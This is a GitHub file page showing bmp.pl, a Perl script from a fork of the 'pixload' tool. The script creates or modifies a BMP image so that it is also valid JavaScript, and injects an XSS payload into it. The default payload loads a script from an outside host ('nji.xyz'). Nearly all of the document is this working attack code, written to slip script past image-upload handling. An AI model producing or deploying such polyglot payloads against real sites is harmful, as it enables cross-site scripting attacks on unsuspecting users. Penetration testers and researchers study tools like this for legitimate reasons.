forked from sighook/pixload
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbmp.pl
executable file
·94 lines (70 loc) · 2.08 KB
/
bmp.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
#!/usr/bin/perl
#
# BMP Payload Creator/Injector
#
# coded by chinarulezzz, [email protected]
# credits to Osanda Malith Jayathissa
#
# See LICENSE file for copyright and license details.
#
use strict;
use warnings;
use feature 'say';
use POSIX;
use Getopt::Long;
sub usage;
sub create_bmp;
sub inject_payload;
# Command line options
GetOptions(
'help!' => \my $help,
'payload=s' => \my $payload,
'output=s' => \my $outfile,
);
usage(0) if $help;
usage(1) unless $outfile;
$payload //= '<script src=//nji.xyz></script>';
say <<EOF;
[>| BMP Payload Creator/Injector |<]
https://github.com/chinarulezzz/pixload
EOF
create_bmp unless -f $outfile;
inject_payload;
say `file $outfile` if -f '/usr/bin/file';
say `hexdump -C $outfile` if -f '/usr/bin/hexdump';
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Subroutines #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
sub usage {
say <<"EOF";
Usage: $0 [-payload 'STRING'] -output payload.bmp
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
EOF
exit +shift;
}
sub create_bmp {
say "[>] Generating output file";
my $bmp_minimal =
"\x42\x4d\x1e\x00\x00\x00\x00\x00\x00\x00\x1a\x00"
. "\x00\x00\x0c\x00\x00\x00\x01\x00\x01\x00\x01\x00"
. "\x18\x00\x00\x00\xff\x00";
sysopen my $fh, $outfile, O_CREAT|O_WRONLY;
syswrite $fh, $bmp_minimal;
close $fh;
say "[✔] File saved to: $outfile\n";
}
sub inject_payload {
say "[>] Injecting payload into $outfile";
sysopen my $fh, $outfile, O_RDWR;
sysseek $fh, 2, SEEK_SET;
syswrite $fh, "\x2f\x2a";
sysseek $fh, 0, SEEK_END;
syswrite $fh, "\x2a\x2f\x3d\x31\x3b";
syswrite $fh, $payload;
syswrite $fh, "\x3b";
close $fh;
say "[✔] Payload was injected successfully\n";
}
# vim:sw=4:ts=4:sts=4:et:cc=80
# End of file